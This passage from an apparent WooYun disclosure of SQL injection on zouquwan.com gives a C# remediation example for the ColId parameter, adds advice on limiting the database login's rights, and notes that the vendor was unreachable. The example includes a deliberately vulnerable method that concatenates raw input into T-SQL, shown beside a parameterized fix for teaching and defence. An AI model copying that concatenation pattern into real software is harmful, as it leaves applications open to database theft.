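The report gives no fix plan, so the following is an added example, not code from the report or from zouquwan.com (whose source is not shown). It contrasts a hypothetical reconstruction of the vulnerable pattern, in which the ColId query-string value is concatenated into T-SQL so that a value like the sqlmap payload in the proof above becomes part of the statement, with a hardened ASP.NET handler that validates the type at the boundary and binds the value as a SqlParameter. The table dbo.Ky_U_Server comes from the dump above; the column names ServerId and ServerName, the method names and the connection string are assumptions.

```csharp
// Added example; not the site's code. dbo.Ky_U_Server is a table name from the
// report, ServerId/ServerName and the method names are assumed for illustration.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web;

public static class ServerListQueries
{
    // HYPOTHETICAL vulnerable pattern: the raw query-string value is spliced into
    // the statement, so any T-SQL the client sends is executed as the web login.
    public static string BuildVulnerableSql(string colIdFromRequest)
    {
        return "SELECT ServerId, ServerName FROM dbo.Ky_U_Server WHERE ColId = "
               + colIdFromRequest;
    }

    // Boundary validation: ColId is an identifier, so only a positive integer
    // with no sign, whitespace or other characters is accepted.
    public static bool TryParseColId(string raw, out int colId)
    {
        colId = 0;
        if (string.IsNullOrWhiteSpace(raw))
            return false;
        bool ok = int.TryParse(raw.Trim(), NumberStyles.None,
                               CultureInfo.InvariantCulture, out colId);
        return ok && colId > 0;
    }

    // Hardened form: the SQL text is a constant and the value travels as a typed
    // parameter, so it can never change the shape of the statement.
    public static DataTable GetServersByColumn(string connectionString,
                                               string colIdFromRequest)
    {
        int colId;
        if (!TryParseColId(colIdFromRequest, out colId))
            throw new HttpException(400, "ColId must be a positive integer");

        const string sql =
            "SELECT ServerId, ServerName FROM dbo.Ky_U_Server WHERE ColId = @ColId";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@ColId", SqlDbType.Int).Value = colId;

            var table = new DataTable();
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

The second half of the fix is the database login rather than the code. The listing above shows that the login used by the web application can enumerate master, msdb and every other database on the instance, which is what turned one injectable parameter into a cross-database dump; the connection string in Web.config should use a login that holds only the rights it needs in the application's own database and is not a member of the sysadmin role. That does not remove an injection bug, but it bounds what the next one can reach.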

Copyright notice: when republishing, credit the source 路人甲@乌云


Vulnerability responses

Vendor response:

Could not contact the vendor, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)